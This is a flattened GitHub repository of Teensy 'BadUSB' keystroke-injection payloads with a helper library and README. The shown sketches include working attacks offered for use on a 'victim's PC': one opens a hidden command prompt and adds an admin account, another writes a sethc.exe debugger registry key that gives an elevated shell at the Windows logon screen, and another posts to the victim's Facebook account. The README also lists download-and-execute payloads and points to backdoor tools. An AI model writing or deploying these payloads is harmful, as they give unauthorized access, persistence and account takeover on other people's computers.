├── PaensyLib ├── read.txt ├── paensy.h └── paensy.cpp ├── Payloads ├── youtube-rick-roll.ino ├── Hello-World.ino ├── Facebook_Post_Updated.ino ├── BadUSB_AddAdmin.ino ├── shutdown-prank.ino ├── BadUSB_HideWindow.ino ├── Screen-rotation-pranks.ino ├── Windows7-BypassLogon-Screen.ino ├── Accessable.ino ├── BadUSB_FacebookPost.ino ├── powershell-admin-download-execute.ino ├── You_spin_me__round.ino ├── Bye_Explorer.ino ├── add_user+enable_rdp.ino ├── BadUSB_LockYourComputer.ino ├── wallpaper-prank.ino ├── BadUSB_DownloadExecute.ino ├── windows-forkbomb.ino ├── Dont-fuck-it-up.ino ├── Teensypreter.ino └── WiFi_Hacker.ino └── README.md /PaensyLib/read.txt: -------------------------------------------------------------------------------- 1 | Getting Started With Paensy 2 | 3 | You will need the Teensy USB Development Board and Teensyduino. The PJRC website has a very easy to use guide on getting Teensyduino setup. 4 | 5 | Once Teensyduino is installed and working, place the PaensyLib folder inside your Arduino\libraries. Arduino is installed in your Program Files (x86 if 64 bit) directory by default. To utilize Paensy, simply include the library in your code: 6 | 7 | #include 8 | -------------------------------------------------------------------------------- /PaensyLib/paensy.h: -------------------------------------------------------------------------------- 1 | #ifndef paensy_h 2 | #define paensy_h 3 | #include "WProgram.h" 4 | 5 | extern int delayAm; 6 | extern int morseDelay; 7 | extern int LED_PIN; 8 | extern void SetDelay(int _delayAm); 9 | extern void SetMorseDelay(int _morseDelay); 10 | extern void SetLEDPin(int _LED_PIN); 11 | extern int GetDelay(); 12 | extern int GetMorseDelay(); 13 | extern int GetLEDPin(); 14 | extern void PerformInitDelay(); 15 | extern void RunCommand(char *command); //Opens the run bar and executes the command. 16 | extern void HideCurWindow(int screenHeight); 17 | extern void AddUser(String uname, String pword); 18 | extern void PressKey(int key, int amount); 19 | extern void TypeLn(String chars); 20 | extern void Alt(int key); 21 | extern void Ctrl(int key); 22 | extern void Shift(int key); 23 | extern void LED_MorseDot(); 24 | extern void LED_MorseDash(); 25 | extern void LED_Flutter(int fDelay, int fAmount); 26 | #endif -------------------------------------------------------------------------------- /Payloads/youtube-rick-roll.ino: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | TeensyDuino ( BadUSB) Like a Rubber Ducky ) 4 | 5 | You can buy Teensy >> ( https://www.pjrc.com/teensy/teensyduino.html ) 6 | 7 | Tutorial >> ( https://www.pjrc.com/teensy/teensyduino.html ) , Youtube.com or Google.com :> 8 | 9 | PAYLOAD : 10 | 11 | 12 | PLAY YOUTUBE - PRANK :> You can change the link youtube 13 | 14 | @ Edo -m- you can contact me in screetsec@gmail.com 15 | 16 | */ 17 | 18 | int ds = 500; 19 | 20 | #if defined(CORE_TEENSY) 21 | #define LED_PIN 13 22 | #endif 23 | 24 | 25 | 26 | void setup() 27 | { 28 | 29 | // allow controlling LED 30 | pinMode(LED_PIN, OUTPUT); 31 | // turn the LED on while running 32 | digitalWrite(LED_PIN, HIGH); 33 | 34 | delay(5000); 35 | 36 | Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); 37 | Keyboard.set_key1(KEY_R); 38 | Keyboard.send_now(); 39 | 40 | delay(500); 41 | Keyboard.set_modifier(0); 42 | Keyboard.set_key1(0); 43 | Keyboard.send_now(); 44 | Keyboard.print("https://www.youtube.com/watch?v=IC5YozmvPpM"); //Rick roll never give up wkwk 45 | Keyboard.set_key1(KEY_ENTER); 46 | Keyboard.send_now(); 47 | Keyboard.set_key1(0); 48 | Keyboard.send_now(); 49 | 50 | } 51 | 52 | void loop() 53 | { 54 | // blink quickly when complete 55 | digitalWrite(LED_PIN, HIGH); 56 | delay(ds/2); 57 | digitalWrite(LED_PIN, LOW); 58 | delay(ds/2); 59 | } 60 | -------------------------------------------------------------------------------- /Payloads/Hello-World.ino: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | TeensyDuino ( BadUSB) Like a Rubber Ducky ) 4 | 5 | You can buy Teensy >> ( https://www.pjrc.com/teensy/teensyduino.html ) 6 | 7 | Tutorial >> ( https://www.pjrc.com/teensy/teensyduino.html ) , Youtube.com or Google.com :> 8 | 9 | PAYLOAD : 10 | 11 | 12 | OPEN NOTEPAD AND WRITE HELLO WORLD 13 | 14 | 15 | @ Edo -m- you can contact me in screetsec@gmail.com 16 | 17 | */ 18 | 19 | int ds = 500; 20 | 21 | #if defined(CORE_TEENSY) 22 | #define LED_PIN 13 23 | #endif 24 | 25 | 26 | 27 | void setup() 28 | { 29 | 30 | // allow controlling LED 31 | pinMode(LED_PIN, OUTPUT); 32 | // turn the LED on while running 33 | digitalWrite(LED_PIN, HIGH); 34 | 35 | delay(5000); 36 | 37 | Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); 38 | Keyboard.set_key1(KEY_R); 39 | Keyboard.send_now(); 40 | 41 | delay(500); 42 | Keyboard.set_modifier(0); 43 | Keyboard.set_key1(0); 44 | Keyboard.send_now(); 45 | Keyboard.print("notepad.exe"); 46 | Keyboard.set_key1(KEY_ENTER); 47 | Keyboard.send_now(); 48 | Keyboard.set_key1(0); 49 | Keyboard.send_now(); 50 | 51 | 52 | delay(300); 53 | Keyboard.print(" Hello World !!"); 54 | Keyboard.set_key1(KEY_ENTER); 55 | Keyboard.send_now(); 56 | Keyboard.set_key1(0); 57 | Keyboard.send_now(); 58 | 59 | } 60 | 61 | void loop() 62 | { 63 | // blink quickly when complete 64 | digitalWrite(LED_PIN, HIGH); 65 | delay(ds/2); 66 | digitalWrite(LED_PIN, LOW); 67 | delay(ds/2); 68 | } 69 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Payload-Teensy ( BadUSB ) Like a Rubber Ducky 2 | 3 | This script was tested on an Teensy 3.2 and Windows. To run this script , simply download the repository and extract in your pc or lapt. Paste the the payload script into your Arduino . So this is all of payload for teensy ( sketch ) 4 | You can buy Teensy >> ( https://www.pjrc.com ) 5 | 6 | 7 | ## PaensyLib By Ozuru 8 | You will need the Teensy USB Development Board and Teensyduino. The PJRC website has a very easy to use guide on getting Teensyduino setup. 9 | 10 | Once Teensyduino is installed and working, place the PaensyLib folder inside your Arduino\libraries. Arduino is installed in your Program Files (x86 if 64 bit) directory by default. To utilize Paensy, simply include the library in your code: 11 | 12 | #include 13 | 14 | List payload paensy 15 | 1. BadUSB_AddAdmin 16 | 2. BadUSB_DownloadExecute 17 | 3. BadUSB_FacebookPost 18 | 4. BadUSB_HideWindow 19 | 5. BadUSB_LockYourComputer (fix with me) 20 | 21 | If list payload 1,2,3,4 not work you can use Kautilya ( is the best for execute backdoor or powershell ) 22 | 23 | ## Tutorial for use teensy 24 | 25 | 1. ( https://www.pjrc.com/teensy/teensyduino.html ) 26 | 2. ( www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle ) 27 | 28 | ## Another Payload you can find 29 | 1. ( https://www.trustedsec.com/social-engineer-toolkit/ ) 30 | 2. ( www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle ) 31 | 3. ( http://malware.cat/?p=89 ) 32 | 4. ( https://github.com/Ozuru/Paensy/tree/master/Payloads ) 33 | 34 | ## Contact 35 | 36 | @ Edo -m- you can contact me in screetsec@gmail.com 37 | thanks 38 | 39 | Ozuru > https://github.com/Ozuru/ 40 | 41 | #THE PAYLOAD FOR WINDOWS 42 | 43 | 44 | -------------------------------------------------------------------------------- /Payloads/Facebook_Post_Updated.ino: -------------------------------------------------------------------------------- 1 | /* 2 | * Facebook Post script for Teensy. 3 | * I forgot who made this script 4 | * originally (so sorry!), but 5 | * the Facebook mobile site had 6 | * changed since the original script 7 | * was published, so I updated it. 8 | * Scroll down to find the message 9 | * to replace it with your own. 10 | * 11 | * Have fun! 12 | * 13 | * - B3H1NDu/Keith Anderson 14 | */ 15 | 16 | #include 17 | 18 | void setup() { 19 | 20 | // Configure the delay that everything else scales off of. 21 | SetDelay(200); 22 | // Configure the delay that the Morse code uses. 23 | SetMorseDelay(250); 24 | 25 | // Perform an initial delay to give the USB time to prepare. 26 | PerformInitDelay(); 27 | 28 | // LED pin number, 13 for 3.1 29 | // 11 for 2 and 2.x 30 | SetLEDPin(13); 31 | 32 | // Put the pin into output mode 33 | pinMode(LED_PIN, OUTPUT); 34 | 35 | // Turn on the LED pin so we know the device is running. 36 | digitalWrite(LED_PIN, HIGH); 37 | 38 | // Navigate to the mobile version to the site as it's easier to traverse using a keyboard. 39 | RunCommand("http://m.facebook.com/"); 40 | 41 | delay(3000); 42 | 43 | // Tab our way to statuses button. 44 | PressKey(KEY_TAB, 12); 45 | 46 | delay(1000); 47 | 48 | // Type our Facebook message. 49 | TypeLn("This account has been hacked because I let someone plug in a USB, Signed - The USB in question"); 50 | 51 | // Tab our way to the post button. 52 | PressKey(KEY_TAB, 2); 53 | 54 | delay(1000); 55 | 56 | // Post the status. 57 | PressKey(KEY_ENTER, 1); 58 | 59 | delay(1000); 60 | 61 | // Close the tab. 62 | Ctrl(KEY_W); 63 | 64 | } 65 | 66 | void loop() { 67 | // Celebratory LED fluttering. 68 | LED_Flutter(200, 10); 69 | 70 | // P 71 | LED_MorseDot(); 72 | LED_MorseDash(); 73 | LED_MorseDash(); 74 | LED_MorseDot(); 75 | 76 | // W 77 | LED_MorseDot(); 78 | LED_MorseDash(); 79 | LED_MorseDash(); 80 | 81 | // N 82 | LED_MorseDash(); 83 | LED_MorseDot(); 84 | 85 | // 3 86 | LED_MorseDot(); 87 | LED_MorseDot(); 88 | LED_MorseDot(); 89 | LED_MorseDash(); 90 | LED_MorseDash(); 91 | 92 | // D 93 | LED_MorseDash(); 94 | LED_MorseDot(); 95 | LED_MorseDot(); 96 | 97 | // Flutter again. 98 | LED_Flutter(200, 10); 99 | } 100 | -------------------------------------------------------------------------------- /Payloads/BadUSB_AddAdmin.ino: -------------------------------------------------------------------------------- 1 | /*** 2 | * ___ _ _ ___ _ _ 3 | * / _ \ | | | | / _ \ | | (_) 4 | * / /_\ \ __| | __| | / /_\ \ __| |_ __ ___ _ _ __ 5 | * | _ |/ _` |/ _` | | _ |/ _` | '_ ` _ \| | '_ \ 6 | * | | | | (_| | (_| | | | | | (_| | | | | | | | | | | 7 | * \_| |_/\__,_|\__,_| \_| |_/\__,_|_| |_| |_|_|_| |_| 8 | * 9 | * 10 | * ______ _____ 11 | * | ___ \ | _ | 12 | * | |_/ /_ _ | | | |_____ _ _ __ _ _ 13 | * | ___ \ | | | | | | |_ / | | | '__| | | | 14 | * | |_/ / |_| | \ \_/ // /| |_| | | | |_| | 15 | * \____/ \__, | \___//___|\__,_|_| \__,_| 16 | * __/ | 17 | * |___/ 18 | */ 19 | 20 | #include 21 | 22 | void setup() { 23 | 24 | // Configure the delay that everything else scales off of. 25 | SetDelay(100); 26 | // Configure the delay that the Morse code uses. 27 | SetMorseDelay(250); 28 | 29 | // Perform an initial delay to give the USB time to prepare. 30 | PerformInitDelay(); 31 | 32 | // LED pin number, 13 for 3.1 33 | // 11 for 2 and 2.x 34 | SetLEDPin(13); 35 | 36 | // Put pin into output mode. 37 | pinMode(GetLEDPin(), OUTPUT); 38 | 39 | // Turn on the LED pin so we know the drive is running. 40 | digitalWrite(GetLEDPin(), HIGH); 41 | 42 | delay(1000); 43 | 44 | // Open a command prompt that is harder to see. 45 | RunCommand("cmd /Q /D /T:7F /F:OFF /V:ON /K"); 46 | 47 | delay(500); 48 | 49 | // Hide the current window (the command prompt we just opened). 50 | HideCurWindow(1080); 51 | 52 | delay(500); 53 | 54 | // Add a new admin user. 55 | AddUser("dontmindme", "SecurePass"); 56 | } 57 | 58 | void loop() { 59 | // Celebratory LED fluttering. 60 | LED_Flutter(200, 10); 61 | 62 | // P 63 | LED_MorseDot(); 64 | LED_MorseDash(); 65 | LED_MorseDash(); 66 | LED_MorseDot(); 67 | 68 | // W 69 | LED_MorseDot(); 70 | LED_MorseDash(); 71 | LED_MorseDash(); 72 | 73 | // N 74 | LED_MorseDash(); 75 | LED_MorseDot(); 76 | 77 | // 3 78 | LED_MorseDot(); 79 | LED_MorseDot(); 80 | LED_MorseDot(); 81 | LED_MorseDash(); 82 | LED_MorseDash(); 83 | 84 | // D 85 | LED_MorseDash(); 86 | LED_MorseDot(); 87 | LED_MorseDot(); 88 | 89 | // Flutter again. 90 | LED_Flutter(200, 10); 91 | } -------------------------------------------------------------------------------- /Payloads/shutdown-prank.ino: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | TeensyDuino ( BadUSB) Like a Rubber Ducky ) 4 | 5 | You can buy Teensy >> ( https://www.pjrc.com/teensy/teensyduino.html ) 6 | 7 | Tutorial >> ( https://www.pjrc.com/teensy/teensyduino.html ) , Youtube.com or Google.com :> 8 | 9 | PAYLOAD : 10 | 11 | 12 | AUTOMATED SHUTDOWN 13 | 14 | Press shift five times when on the pc on login screen 15 | All the user would then need to do upon returning to the PC later on is tap SHIFT five times to arouse sticky keys, and like magic, an elevated command prompt is launched. 16 | From then on, a user is free to run executables as he or she pleases – including explorer 17 | 18 | thanks : http://www.redmondpie.com/windows-7-exploit-allows-any-program-to-run-on-login-screen/ 19 | 20 | @ Edo -m- you can contact me in screetsec@gmail.com 21 | 22 | */ 23 | 24 | 25 | 26 | int ds = 500; 27 | 28 | #if defined(CORE_TEENSY) 29 | #define LED_PIN 13 30 | #endif 31 | 32 | void setup() 33 | { 34 | 35 | // allow controlling LED 36 | pinMode(LED_PIN, OUTPUT); 37 | // turn the LED on while running 38 | digitalWrite(LED_PIN, HIGH); 39 | 40 | delay(5000); 41 | cmd_admin(); 42 | 43 | delay(3000); 44 | send_altyes(); 45 | 46 | delay(1000); 47 | Keyboard.print("shutdown /r /t 10"); 48 | Keyboard.set_key1(KEY_ENTER); 49 | Keyboard.send_now(); 50 | Keyboard.set_key1(0); 51 | Keyboard.send_now(); 52 | 53 | delay(1000); 54 | Keyboard.print("exit"); 55 | Keyboard.set_key1(KEY_ENTER); 56 | Keyboard.send_now(); 57 | Keyboard.set_key1(0); 58 | Keyboard.send_now(); 59 | 60 | } 61 | 62 | void loop(){ 63 | // blink quickly when complete 64 | digitalWrite(LED_PIN, HIGH); 65 | delay(ds/2); 66 | digitalWrite(LED_PIN, LOW); 67 | delay(ds/2); 68 | } 69 | 70 | 71 | void send_altyes(){ 72 | delay(1000); 73 | Keyboard.set_modifier(MODIFIERKEY_ALT); 74 | Keyboard.set_key1(KEY_Y); 75 | Keyboard.send_now(); 76 | delay(100); 77 | 78 | Keyboard.set_modifier(0); 79 | Keyboard.set_key1(0); 80 | Keyboard.send_now(); 81 | } 82 | 83 | void cmd_admin(){ 84 | Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); 85 | Keyboard.send_now(); 86 | delay(1000); 87 | Keyboard.set_modifier(0); 88 | Keyboard.send_now(); 89 | delay(2000); 90 | Keyboard.print("cmd"); 91 | 92 | delay(2000); 93 | Keyboard.set_modifier(MODIFIERKEY_CTRL); 94 | Keyboard.send_now(); 95 | Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT); 96 | Keyboard.send_now(); 97 | Keyboard.set_key1(KEY_ENTER); 98 | Keyboard.send_now(); 99 | 100 | delay(200); 101 | Keyboard.set_modifier(0); 102 | Keyboard.set_key1(0); 103 | Keyboard.send_now(); 104 | } 105 | 106 | -------------------------------------------------------------------------------- /Payloads/BadUSB_HideWindow.ino: -------------------------------------------------------------------------------- 1 | /*** 2 | * _ _ _ _ _ _ _ _ 3 | * | | | (_) | | | | | (_) | | 4 | * | |_| |_ __| | ___ | | | |_ _ __ __| | _____ __ 5 | * | _ | |/ _` |/ _ \ | |/\| | | '_ \ / _` |/ _ \ \ /\ / / 6 | * | | | | | (_| | __/ \ /\ / | | | | (_| | (_) \ V V / 7 | * \_| |_/_|\__,_|\___| \/ \/|_|_| |_|\__,_|\___/ \_/\_/ 8 | * 9 | * 10 | * _ _____ 11 | * | | | _ | 12 | * | |__ _ _ | | | |_____ _ _ __ _ _ 13 | * | '_ \| | | | | | | |_ / | | | '__| | | | 14 | * | |_) | |_| | \ \_/ // /| |_| | | | |_| | 15 | * |_.__/ \__, | \___//___|\__,_|_| \__,_| 16 | * __/ | 17 | * |___/ 18 | */ 19 | 20 | #include 21 | 22 | void setup() { 23 | 24 | // Configure the delay that everything else scales off of. 25 | SetDelay(100); 26 | // Configure the delay that the Morse code uses. 27 | SetMorseDelay(250); 28 | 29 | // Perform an initial delay to give the USB time to prepare. 30 | PerformInitDelay(); 31 | 32 | // LED pin number, 13 for 3.1 33 | // 11 for 2 and 2.x 34 | SetLEDPin(13); 35 | 36 | // Put the pin into output mode 37 | pinMode(LED_PIN, OUTPUT); 38 | 39 | // Turn on the LED pin so we know the device is running. 40 | digitalWrite(LED_PIN, HIGH); 41 | 42 | delay(3000); 43 | 44 | // Open CMD faded and harder to see. 45 | RunCommand("cmd /Q /D /T:7F /F:OFF /V:ON /K"); 46 | 47 | delay(1000); 48 | 49 | // Pass the screen height as an argument so it can guarantee it hides the window. 50 | HideCurWindow(1080); 51 | 52 | // Demonstrate the ability to still type in the window. If you want to see it, alt + space the window and then select "Maximize". 53 | TypeLn("ping www.google.com"); 54 | 55 | } 56 | 57 | void loop() { 58 | // Celebratory LED fluttering. 59 | LED_Flutter(200, 10); 60 | 61 | // P 62 | LED_MorseDot(); 63 | LED_MorseDash(); 64 | LED_MorseDash(); 65 | LED_MorseDot(); 66 | 67 | // W 68 | LED_MorseDot(); 69 | LED_MorseDash(); 70 | LED_MorseDash(); 71 | 72 | // N 73 | LED_MorseDash(); 74 | LED_MorseDot(); 75 | 76 | // 3 77 | LED_MorseDot(); 78 | LED_MorseDot(); 79 | LED_MorseDot(); 80 | LED_MorseDash(); 81 | LED_MorseDash(); 82 | 83 | // D 84 | LED_MorseDash(); 85 | LED_MorseDot(); 86 | LED_MorseDot(); 87 | 88 | // Flutter again. 89 | LED_Flutter(200, 10); 90 | } 91 | -------------------------------------------------------------------------------- /Payloads/Screen-rotation-pranks.ino: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | TeensyDuino ( BadUSB) Like a Rubber Ducky ) 4 | 5 | You can buy Teensy >> ( https://www.pjrc.com/teensy/teensyduino.html ) 6 | 7 | Tutorial >> ( https://www.pjrc.com/teensy/teensyduino.html ) , Youtube.com or Google.com :> 8 | 9 | PAYLOAD : 10 | 11 | 12 | WINDOWS SCREEN ROTATION ( PRANK ) YOUR FRIENDS :> 13 | 14 | 15 | @ Edo -m- you can contact me in screetsec@gmail.com 16 | 17 | */ 18 | 19 | 20 | 21 | int ds = 500; 22 | 23 | #if defined(CORE_TEENSY) 24 | #define LED_PIN 13 25 | #endif 26 | 27 | void setup() 28 | { 29 | 30 | // allow controlling LED 31 | pinMode(LED_PIN, OUTPUT); 32 | // turn the LED on while running 33 | digitalWrite(LED_PIN, HIGH); 34 | 35 | delay(5000); 36 | Screen_resol(); 37 | 38 | delay(2000); 39 | Bebe(); 40 | 41 | delay(1000); 42 | Bebe(); 43 | 44 | delay(1000); 45 | Bebe(); 46 | 47 | delay(1000); 48 | Down(); 49 | 50 | delay(1000); 51 | Down(); 52 | 53 | delay(1000); 54 | Bebe(); 55 | 56 | delay(1000); 57 | Bebe(); 58 | 59 | delay(1000); 60 | Bebe(); 61 | 62 | delay(1000); 63 | Bebe(); 64 | 65 | delay(200); 66 | Bebe(); 67 | 68 | delay(1000); 69 | Keyboard.set_key1(KEY_ENTER); 70 | Keyboard.send_now(); 71 | 72 | delay(200); 73 | Keyboard.set_modifier(0); 74 | Keyboard.set_key1(0); 75 | Keyboard.send_now(); 76 | 77 | delay(1000); 78 | Bebe(); 79 | 80 | delay(1000); 81 | Keyboard.set_key1(KEY_ENTER); 82 | Keyboard.send_now(); 83 | 84 | delay(200); 85 | Keyboard.set_modifier(0); 86 | Keyboard.set_key1(0); 87 | Keyboard.send_now(); 88 | 89 | } 90 | 91 | void loop(){ 92 | // blink quickly when complete 93 | digitalWrite(LED_PIN, HIGH); 94 | delay(ds/2); 95 | digitalWrite(LED_PIN, LOW); 96 | delay(ds/2); 97 | } 98 | 99 | 100 | void Down(){ 101 | Keyboard.set_key1(KEY_DOWN); 102 | Keyboard.send_now(); 103 | 104 | delay(200); 105 | Keyboard.set_modifier(0); 106 | Keyboard.set_key1(0); 107 | Keyboard.send_now(); 108 | } 109 | 110 | void Bebe(){ 111 | Keyboard.set_key1(KEY_TAB); 112 | Keyboard.send_now(); 113 | 114 | delay(200); 115 | Keyboard.set_modifier(0); 116 | Keyboard.set_key1(0); 117 | Keyboard.send_now(); 118 | } 119 | 120 | void Screen_resol(){ 121 | Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); 122 | Keyboard.send_now(); 123 | delay(1000); 124 | Keyboard.set_modifier(0); 125 | Keyboard.send_now(); 126 | delay(2000); 127 | Keyboard.print("Screen resolution"); 128 | 129 | delay(1000); 130 | Keyboard.set_key1(KEY_ENTER); 131 | Keyboard.send_now(); 132 | 133 | delay(200); 134 | Keyboard.set_modifier(0); 135 | Keyboard.set_key1(0); 136 | Keyboard.send_now(); 137 | } 138 | 139 | -------------------------------------------------------------------------------- /Payloads/Windows7-BypassLogon-Screen.ino: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | TeensyDuino ( BadUSB) Like a Rubber Ducky ) 4 | 5 | You can buy Teensy >> ( https://www.pjrc.com/teensy/teensyduino.html ) 6 | 7 | Tutorial >> ( https://www.pjrc.com/teensy/teensyduino.html ) , Youtube.com or Google.com :> 8 | 9 | PAYLOAD : 10 | 11 | 12 | WINDOWS 7 ALLOWS ANY PROGRAMS TO RUN ON LOGIN SCREEN 13 | Press shift five times when on the pc on login screen 14 | All the user would then need to do upon returning to the PC later on is tap SHIFT five times to arouse sticky keys, and like magic, an elevated command prompt is launched. 15 | From then on, a user is free to run executables as he or she pleases – including explorer 16 | 17 | thanks : http://www.redmondpie.com/windows-7-exploit-allows-any-program-to-run-on-login-screen/ 18 | 19 | @ Edo -m- you can contact me in screetsec@gmail.com 20 | 21 | */ 22 | 23 | 24 | 25 | int ds = 500; 26 | 27 | #if defined(CORE_TEENSY) 28 | #define LED_PIN 13 29 | #endif 30 | 31 | void setup() 32 | { 33 | 34 | // allow controlling LED 35 | pinMode(LED_PIN, OUTPUT); 36 | // turn the LED on while running 37 | digitalWrite(LED_PIN, HIGH); 38 | 39 | delay(5000); 40 | cmd_admin(); 41 | 42 | delay(3000); 43 | send_altyes(); 44 | 45 | delay(1000); 46 | Keyboard.print("REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\ \" /v Debugger /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\""); 47 | Keyboard.set_key1(KEY_ENTER); 48 | Keyboard.send_now(); 49 | Keyboard.set_key1(0); 50 | Keyboard.send_now(); 51 | 52 | delay(2000); 53 | Keyboard.print("exit"); 54 | Keyboard.set_key1(KEY_ENTER); 55 | Keyboard.send_now(); 56 | Keyboard.set_key1(0); 57 | Keyboard.send_now(); 58 | 59 | } 60 | 61 | void loop(){ 62 | // blink quickly when complete 63 | digitalWrite(LED_PIN, HIGH); 64 | delay(ds/2); 65 | digitalWrite(LED_PIN, LOW); 66 | delay(ds/2); 67 | } 68 | 69 | 70 | void send_altyes(){ 71 | delay(1000); 72 | Keyboard.set_modifier(MODIFIERKEY_ALT); 73 | Keyboard.set_key1(KEY_Y); 74 | Keyboard.send_now(); 75 | delay(100); 76 | 77 | Keyboard.set_modifier(0); 78 | Keyboard.set_key1(0); 79 | Keyboard.send_now(); 80 | } 81 | 82 | void cmd_admin(){ 83 | Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); 84 | Keyboard.send_now(); 85 | delay(1000); 86 | Keyboard.set_modifier(0); 87 | Keyboard.send_now(); 88 | delay(2000); 89 | Keyboard.print("cmd"); 90 | 91 | delay(2000); 92 | Keyboard.set_modifier(MODIFIERKEY_CTRL); 93 | Keyboard.send_now(); 94 | Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT); 95 | Keyboard.send_now(); 96 | Keyboard.set_key1(KEY_ENTER); 97 | Keyboard.send_now(); 98 | 99 | delay(200); 100 | Keyboard.set_modifier(0); 101 | Keyboard.set_key1(0); 102 | Keyboard.send_now(); 103 | } 104 | 105 | -------------------------------------------------------------------------------- /Payloads/Accessable.ino: -------------------------------------------------------------------------------- 1 | /* 2 | * Accessable script for Teensy. 3 | * Created by B3H1NDu/Keith Anderson 4 | * 5 | * Super annoying prank script, turns 6 | * on high-contrast mode, enables 7 | * Narrator and spins the screen a few 8 | * times. 9 | * 10 | * You may need to adjust the delays 11 | * depending on the victim's PC. 12 | */ 13 | 14 | #include 15 | 16 | void setup() { 17 | 18 | // Configure the delay that everything else scales off of. 19 | SetDelay(200); 20 | // Configure the delay that the Morse code uses. 21 | SetMorseDelay(250); 22 | 23 | // Perform an initial delay to give the USB time to prepare. 24 | PerformInitDelay(); 25 | 26 | // LED pin number, 13 for 3.1 27 | // 11 for 2 and 2.x 28 | SetLEDPin(13); 29 | // Put the pin into output mode 30 | pinMode(LED_PIN, OUTPUT); 31 | // Turn on the LED pin so we know the device is running. 32 | digitalWrite(LED_PIN, HIGH); 33 | delay(3000); 34 | // Turn on High Contrast Mode 35 | Keyboard.set_modifier(MODIFIERKEY_SHIFT | MODIFIERKEY_ALT); 36 | Keyboard.set_key1(KEY_PRINTSCREEN); 37 | Keyboard.send_now(); 38 | Keyboard.set_modifier(0); 39 | Keyboard.set_key1(0); 40 | Keyboard.send_now(); 41 | delay(1000); 42 | Keyboard.set_key1(KEY_ENTER); 43 | Keyboard.send_now(); 44 | Keyboard.set_key1(0); 45 | Keyboard.send_now(); 46 | delay(6000); 47 | // Turn on narrator 48 | Keyboard.set_modifier(MODIFIERKEY_GUI); 49 | Keyboard.set_key1(KEY_ENTER); 50 | Keyboard.send_now(); 51 | Keyboard.set_modifier(0); 52 | Keyboard.set_key1(0); 53 | Keyboard.send_now(); 54 | delay(1000); 55 | Keyboard.set_key1(KEY_LEFT); 56 | Keyboard.send_now(); 57 | Keyboard.set_key1(0); 58 | Keyboard.send_now(); 59 | delay(500); 60 | Keyboard.set_key1(KEY_ENTER); 61 | Keyboard.send_now(); 62 | Keyboard.set_key1(0); 63 | Keyboard.send_now(); 64 | delay(1000); 65 | // Spin the screen 66 | Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT); 67 | Keyboard.set_key1(KEY_RIGHT); 68 | Keyboard.send_now(); 69 | Keyboard.set_key1(KEY_DOWN); 70 | Keyboard.send_now(); 71 | Keyboard.set_key1(KEY_LEFT); 72 | Keyboard.send_now(); 73 | Keyboard.set_key1(KEY_UP); 74 | Keyboard.send_now(); 75 | Keyboard.set_key1(KEY_RIGHT); 76 | Keyboard.send_now(); 77 | Keyboard.set_key1(KEY_DOWN); 78 | Keyboard.send_now(); 79 | Keyboard.set_key1(KEY_LEFT); 80 | Keyboard.send_now(); 81 | Keyboard.set_key1(KEY_UP); 82 | Keyboard.send_now(); 83 | Keyboard.set_modifier(0); 84 | Keyboard.set_key1(0); 85 | Keyboard.send_now(); 86 | } 87 | 88 | void loop() { 89 | // Celebratory LED fluttering. 90 | LED_Flutter(200, 10); 91 | 92 | // P 93 | LED_MorseDot(); 94 | LED_MorseDash(); 95 | LED_MorseDash(); 96 | LED_MorseDot(); 97 | 98 | // W 99 | LED_MorseDot(); 100 | LED_MorseDash(); 101 | LED_MorseDash(); 102 | 103 | // N 104 | LED_MorseDash(); 105 | LED_MorseDot(); 106 | 107 | // 3 108 | LED_MorseDot(); 109 | LED_MorseDot(); 110 | LED_MorseDot(); 111 | LED_MorseDash(); 112 | LED_MorseDash(); 113 | 114 | // D 115 | LED_MorseDash(); 116 | LED_MorseDot(); 117 | LED_MorseDot(); 118 | 119 | // Flutter again. 120 | LED_Flutter(200, 10); 121 | } 122 | -------------------------------------------------------------------------------- /Payloads/BadUSB_FacebookPost.ino: -------------------------------------------------------------------------------- 1 | /*** 2 | * ______ _ _ ______ _ 3 | * | ___| | | | | | ___ \ | | 4 | * | |_ __ _ ___ ___| |__ ___ ___ | | __ | |_/ /__ ___| |_ 5 | * | _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ / | __/ _ \/ __| __| 6 | * | || (_| | (_| __/ |_) | (_) | (_) | < | | | (_) \__ \ |_ 7 | * \_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\ \_| \___/|___/\__| 8 | * 9 | * 10 | * _ _____ 11 | * | | | _ | 12 | * | |__ _ _ | | | |_____ _ _ __ _ _ 13 | * | '_ \| | | | | | | |_ / | | | '__| | | | 14 | * | |_) | |_| | \ \_/ // /| |_| | | | |_| | 15 | * |_.__/ \__, | \___//___|\__,_|_| \__,_| 16 | * __/ | 17 | * |___/ 18 | */ 19 | 20 | #include 21 | 22 | void setup() { 23 | 24 | // Configure the delay that everything else scales off of. 25 | SetDelay(200); 26 | // Configure the delay that the Morse code uses. 27 | SetMorseDelay(250); 28 | 29 | // Perform an initial delay to give the USB time to prepare. 30 | PerformInitDelay(); 31 | 32 | // LED pin number, 13 for 3.1 33 | // 11 for 2 and 2.x 34 | SetLEDPin(13); 35 | 36 | // Put the pin into output mode 37 | pinMode(LED_PIN, OUTPUT); 38 | 39 | // Turn on the LED pin so we know the device is running. 40 | digitalWrite(LED_PIN, HIGH); 41 | 42 | // Navigate to the mobile version to the site as it's easier to traverse using a keyboard. 43 | RunCommand("http://m.facebook.com/"); 44 | 45 | delay(3000); 46 | 47 | // Tab our way to statuses button. 48 | PressKey(KEY_TAB, 8); 49 | 50 | // Go to the statuses page. 51 | 